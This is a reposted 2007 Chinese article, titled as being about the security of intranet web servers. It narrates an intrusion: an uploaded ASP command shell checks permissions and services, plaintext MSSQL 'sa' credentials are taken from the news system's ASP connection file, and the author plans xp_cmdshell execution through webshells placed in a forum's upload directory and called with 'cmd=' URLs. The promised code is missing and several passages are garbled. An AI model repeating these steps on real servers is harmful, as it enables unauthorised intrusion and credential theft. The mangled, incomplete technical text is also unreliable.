This Domain(Admin5.com) is for Sale:

内网建网站服务_器的安全问题

时间:2007-10-27  来源:不详  作者:林仙

  Windows2000IPConfiguration
  Ethernetadapter本地连接:
  Connection-specificDNSSuffix.:
  IPAddress.................:192.168.1.222
  SubnetMask................:255.255.255.0
  DefaultGateway............:192.168.1.1
  哟,在内网,不错,再试试C:\可不可写,答案是不可写(不错)。再试试其他目录,整个C.盘都不可写,只给了Web目录的可写权限。再看一看跑了哪些服务,用netstat-an命令来查看一下。
  TCP127.0.0.1:1433 0.0.0.0:0 LISTENING哟!还跑了MSSQL的,不错。这时候第一个想做的就是看看哪些程序使用了MSSQL数据库。再到主页上逛逛,看到有一个新闻系统,很有可能就是它。用刚才那个aspcmdshell去查看一下这个news/目录里面的ASP程序,看到很多文件第一行都有,基本上这个就是数据库的链接程序了。查看一下:
  strconn="Driver={SQLerver};Ddescription=sqldemo;
  SERVER=127.0.0.1;UID=sa;&
  PWD=hello;DATABASE=news
  setconn=server.createobject("adodb.connection")
  conn.openstrconn
  果然不出我所料(第四大失败,将MSSQL的用户名和密码以明文形式存放在ASP文件里),拿到了MSSQL数据库的密码,而且还是sa用户的,权限比较大哦。本来想看看能不能查找一下新闻系统ASP程序的漏洞,利用一下sqlinjection的。看来现在完全没有必要了。自己写一个可以用MSSQL扩展xp一cmdshell来执行系统命令的ASP程序,这里有可能管理员删了这个扩展,或直接删掉了xplog70.dll这个文件。不管它,先试试再说。写sql.asp内容如下:

dedecms.com


  自己先开防火墙,记录icmp数据包,然后在IE里执行:
  http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=ping 192.168.0.1 
  这个ASP是通过动网论坛自己的上传程序上传机程序设定把上传文件都上传到up1Oad土mageS/这个目录里面,根据当前时间将文件重命名,所以文件名为439587438739·aSp这样的全数字组成。
  防火墙没反应,晕!看来是删了Xp--CmdSheI1这个扩展,或直接删掉了Xp1Og70·d11这个文件。如果没有直接删掉Xp1Og70·d11,而只是删了这个扩展的话,我来试一下恢复这个扩展。再写个ASP:
  上传上去,再执行
http://www.target.com/bbs/uploadimages/23456489432.asp. 

看完这篇,您有何感觉呢?

文章评论

共有位Admini5网友发表了评论 查看完整内容

24小时热门信息